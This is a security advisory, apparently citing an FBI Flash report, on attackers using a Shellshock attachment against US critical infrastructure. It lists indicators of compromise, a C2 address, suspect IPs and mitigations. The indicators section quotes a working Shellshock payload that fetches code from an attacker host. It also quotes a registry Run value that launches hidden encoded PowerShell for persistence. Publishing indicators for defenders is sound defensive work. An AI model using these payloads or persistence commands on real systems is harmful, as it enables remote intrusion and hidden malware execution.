Cyber actors are targeting US critical infrastructure using a malicious attachment leveraging the “shellshock” vulnerability based on historical and current investigative analysis. The same tactics, techniques and procedures (TTPs) could be used against other US critical infrastructure sectors. US authorities are is providing the following indicators of compromise, identified malicious code, and suspect internet protocol (IP) addresses to assist receiving organizations’ computer network defense.[1]
A malicious attachment leveraging the “shellshock” vulnerability uses arbitrary code execution to upload or run a program by passing variables into the shell called “bash”, a common shell used on Linux systems, by modifying the origin http request to run the variables as commands. Once the malware was established, it communicated out over http port 8080 to a listening command and control (C2) server.
Malicious code
()+{+:;+};+/bin/bash+-c+'wget+http://176.126.85.127:8080/megatron+-O+/dev/null'
"shellshock" vulnerability:
()+{+:;+};+/bin/bash+c+'wget+http://176.126.85.127:8080/megatron+-O+/dev/null'
l__l_=%7CF3Jk%7E6k6
default.php
Registry keys
User registry keys:
Key: Software\Microsoft\Windows\CurrentVersion Value: Debug: (Base64 encoded string)
Key: Software\Microsoft\Windows\CurrentVersion\Run
Value: Updater: “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” –c “$x=$((gp
HKCU:Software\Microsoft\Windows\CurrentVersion Debug).Debug);powershell –Win Hidden –enc $x”
C2 server: http://199.71.234.66:8080/index.asp
C:/windows/mssecsvr[.]exe
IP’s Beaconing over port 8080
User-Agent String: Iceweasel/31.8.0
Suspicious IP Addresses
| 185.94.193.198 | 64.120.44.3 |
82.221.100.29 | 31.220.15.253 |
124.248.251.250 | 103.250.186.95 |
5.133.8.46 | 38.132.102.83 |
85.25.100.204 | 176.9.155.82 |
139.99.130.25 | 69.30.236.82 |
5.135.188.128 | 103.250.73.30 |
5.255.91.4 | 40.125.162.43 |
195.154.242.122 | 178.209.51.68 |
91.219.237.172 | 78.129.229.68 |
151.236.18.103 | 103.36.109.46 |
5.79.74.220 | 43.249.39.152 |
199.241.218.69 | 180.198.209.146 |
94.242.206.242 | 81.17.24.46 |
158.255.215.136 | 103.47.207.200 |
62.103.152.170 | 46.105.121.81 |
199.71.234.66 | 185.222.201.17 |
95.215.60.238 | 82.103.132.16 |
175.223.20.107 | 104.254.57.30 |
63.141.226.98 | 46.21.154.228 |
213.236.233.242 | 185.90.61.159 |
95.215.61.63 | 82.202.193.92 |
176.31.225.204 | 111.90.159.23 |
69.30.206.234 | 46.246.28.70 |
223.62.203.100 |
Recommended Mitigations
We suggest precautionary measures to mitigate the threats posed by this vulnerability, specifically scrutinizing any links and/or attachments included in unsolicited emails. In addition to limiting the attack vector, it is important to limit the exposure if a network breach occurs. Proper network segmentation and segregation will assist in limiting exposure of the network and lateral movement of the adversary. This is always a good cyber security practice. Precautionary measures to mitigate these techniques include:
- Prepare an incident response plan to be rapidly implemented in the event of a cyber intrusion.
- Implement multifactor authentication to protect individual accounts.
- Patch all systems for critical vulnerabilities, prioritizing timely patching of Internet-connected servers for known vulnerabilities and software that processes internet data, such as web browsers, browser plugins, and document readers.
- Scrutinize links contained in e-mails and do not open attachments included in unsolicited e-mails.
- Implement application whitelisting to block execution of malware, or at least block execution of files from TEMP directories, from which most phishing malware attempts to execute.
- Randomize local administrator passwords to inhibit lateral movement across workstations.
- Ensure patches are applied and networks are upgraded to the most up to date version of bash to mitigate an attackers ability to use “() {:;};” to remotely exploit the bash shell.
For questions or comments regarding this report, please contact Wapack Labs at 603-606-1246, or feedback@wapacklabs.com
[1] FBI Flash Report / MC-000097-MW fbi.gov
Comments